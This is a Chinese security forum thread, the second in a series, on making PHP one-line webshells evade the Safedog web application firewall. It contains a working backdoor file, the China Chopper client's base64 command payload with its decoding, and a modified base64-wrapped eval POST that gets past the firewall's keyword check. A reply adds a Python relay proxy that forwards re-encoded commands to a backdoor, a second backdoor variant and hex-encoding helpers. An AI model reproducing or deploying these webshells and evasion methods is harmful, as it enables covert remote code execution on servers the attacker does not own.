发表主题 回复主题
  • 1795阅读
  • 15回复

[Web安全]【独家】php一句话后门过狗姿势万千之传输层加工【二】

— 本帖被 笑然 执行加亮操作(2016-12-18) —
先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。
先知技术社区投稿邮箱:Aliyun_xianzhi#service.alibaba.com

上一篇:【独家】php一句话后门过狗姿势万千之后门构造与隐藏【一】

既然木马已就绪,那么想要利用木马,必然有一个数据传输的过程,数据提交是必须的,数据返回一般也会有的,除非执行特殊命令。
当我们用普通菜刀连接后门时,数据时如何提交的,狗狗又是如何识别的,下面结合一个实例,用通俗易懂的方式来演示数据提交层直接过狗原理。
本文意义:纵使网上有很多修改菜刀过狗的方法,但是我都看了下,局限性比较大,而且不太系统,新人学了可能会只是其一不知其二
### 环境:
域名与服务器均为个人真实所有。
服务器开启网站安全狗+服务器安全狗,引擎全部开启,最高防护级别。
### 对比环境:
服务器:apache+php5.3;本地:nginx+php5.3无狗环境作为对比
本地与有狗服务器具有相同的后门代码与链接方式
说明:本文仅分析过狗原理与代码实现,技术层面探讨,菜刀或者其他软件制作与修改本文不予讨论。

### 后门文件:
  1. $a=array(base64_decode($_REQUEST['a']));
  2. @array_map("assert",$a);

菜刀连接方式:http://localhost/test.php?xx=YXNzZXJ0KCRfUkVRVUVTVFsnc29maWEnXSk=     密码:sofia
该文件特征层面可过狗 ,上一篇文章已提到,
我们知道,菜刀已存在这么多年,安全狗早已对菜刀的特征门清,我们先来看下菜刀连接的时候特征是什么。
这是我随便连接的一个后门,其实不管后门代码是什么,打开文件管理,菜刀提交的数据都是一样的,如图

代码为:
  1. sofia=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7

命令执行代码,base64_decode结果为以下,获取当前目录与磁盘名
  1. @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);echo $D."\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir($L.":"))echo($L.":");};echo("|<-");die();


其中参数名“sofia”就是我们所谓的菜刀密码不需要多解释吧?
那么我们在本地手工提交菜刀的post数据看一下:

本地正常返回当前目录与磁盘名,而服务端未显示,一定是被拦截咯,事实证明确实如此:

那为什么没蹦出拦截框呢?
根据我的经验,一般文件特征层能检测到是后门,才会弹窗,数据层一般不弹,当然,这只是我个人见解,可能不严谨。
其实狗狗对后门的检测文件特征是与数据提交检测机制是完全独立的。
为了验证这一点,我在同目录下建立一个null.php,内容为正常代码:

当不post数据时,正常输出内容,说明文件本身没有问题

把狗狗的post数据发一下试试?

又没有回显了,再去狗狗日志看下:

### 菜刀特征分析

那么很明显了,菜刀的post数据已经是个大特征了。
相信大家都能看出来这个eval太惹眼了(当然,其他版本或者其他waf检测的可能会是$_POST,或base64_decode)
  1. sofia=@eval(base64_decode($_POST[z0]));


虽然看上去数据提交不怎么注重隐蔽,但是不得不承认菜刀是个伟大发明。
因为php后门五花八门,接受数据的类型与格式各不相同,于是菜刀就在post数据中再次构造一个执行代码,使得php后门接收到的数据全部统一为:“eval('执行命令')”,这样才使得菜刀的易用性才那么强。
具体代码执行与返回请参考上一章节
## 修改post数据

既然原因清楚了,我们接下来就修改post数据,修改的重点就在于替换eval特征。
### 思路一:分离“eval”四个字母即可
但是post数据中发挥空间太小,暂时没想到什么好办法,当然不同的waf检测的关键词也有所不同
### 思路二:修改后门文件,直接执行语句
这里可能就需要用一些其他回调函数,或者其他猥琐姿势,能够直接执行来自post的base64加密后的纯执行语句。
### 思路三:直接手工构造eval语句
前面说过,post数据最终的结果为:eval('执行命令')”,而且我们的语句对a参数已经decode的了
  1. $a=array(base64_decode($_REQUEST['a']));

那么就直接把整个eval语句base64加密一下即可,
那么我们菜刀原始的利用语句可以这么构造:
  1. eval('@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);echo $D."\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir($L.":"))echo($L.":");};echo("|<-");die();')


然后把这句话base64加密下,得到:
  1. ZXZhbCgnQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7Jyk=


ok,那么这时候我们是直接把这句话传给$a的,那么post数据为:
  1. a=ZXZhbCgnQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7Jyk=


试试?

成功返回结果,换个语句试试?





至此,这是数据流层面的过狗方式,当然过狗思路千千万,不限于这一种,更多的是需要大家去发掘。
另外,
这里要跟大家提一点,assert函数与eval函数是完全不同的函数,不要以为能出phpinfo()结果就是过狗了,assert能执行phpinfo()一类的函数,但是其他php语句还是是需要借用eval的,当然,执行命令也不限于eval,还有各种回调函数。
写在最后

怎么?你是不是还想问菜刀怎么连?
本文开头说了,这里仅讨论技术本身,至于如何去用,那么,会php的人,看了这篇文字,应该已经有思路了,
而不会php的人,可能就想着:“博客赶紧给我来个一句话加软件,最好打开就能用”,然后偷偷窃喜指望它能平天下。
我还是那句话,安全之路,我们大多数人还只是个学者,希望多关注技术本身,不要膨胀才好。
个人博客:http://www.vuln.cn
博客:http://www.vuln.cn
只看该作者 沙发  发表于: 2016-11-28
  1. import web
  2. import requests
  3. import base64
  4. urls = (
  5.     '/', 'hello'
  6. )
  7. app = web.application(urls, globals())
  8. class hello:
  9.     def POST(self):
  10.         payload = web.input()
  11.         payload['xia'] = base64.b64encode(payload['xia'])
  12.         print payload
  13.         req = requests.post('http://www.xxx.com/404.php?huai=YXNzZXJ0', data=payload)
  14.         return req.content
  15. if __name__ == "__main__":
  16.     app.run()
  17. '''
  18. <?php
  19. $a = base64_decode($_GET[huai]);
  20. $b = base64_decode($_POST[xia]);
  21. $a($b);
  22. ?>
  23. '''



菜刀直接连接http://127.0.0.1:8000/  密码是xia


分享一下我的常用手法。
还有rot13  hex等中转手法。

  1. function String2Hex($string){
  2.     $hex='';
  3.     for ($i=0; $i < strlen($string); $i++){
  4.         $hex .= dechex(ord($string[$i]));
  5.     }
  6.     return $hex;
  7. }
  8. function Hex2String($hex){
  9.     $string='';
  10.     for ($i=0; $i < strlen($hex)-1; $i+=2){
  11.         $string .= chr(hexdec($hex[$i].$hex[$i+1]));
  12.     }
  13.     return $string;
  14. }


只看该作者 板凳  发表于: 2016-11-28
楼主整理的挺全,挺辛苦的。       赞一个。
只看该作者 地板  发表于: 2016-11-28
可以
只看该作者 4楼 发表于: 2016-11-28
回1楼坏虾的帖子
请问web 是什么库?自己写的还是pip可以下载的?
级别: M1
只看该作者 5楼 发表于: 2016-11-28
回 2楼(坏虾) 的帖子
还有一篇勒 ,不要着急
级别: M1
只看该作者 6楼 发表于: 2016-11-28
回 2楼(坏虾) 的帖子
你倒是也整理powershell的连载出来
只看该作者 7楼 发表于: 2016-11-30
Re:回1楼坏虾的帖子
引用
引用第4楼中文于2016-11-28 17:23发表的 回1楼坏虾的帖子 :
请问web 是什么库?自己写的还是pip可以下载的?
[url=https://xianzhi.aliyun.com/forum/job.php?action=topost&tid=442&pid=819][/url]

webpy   pip下载的。
只看该作者 8楼 发表于: 2016-11-30
回 6楼(hades) 的帖子
技术渣渣,怕丢人。
级别: M1
只看该作者 9楼 发表于: 2016-11-30
回 8楼(坏虾) 的帖子
   我不嫌弃,快到碗里来
发表主题 回复主题
« 返回列表
«12»
共2页
上一主题下一主题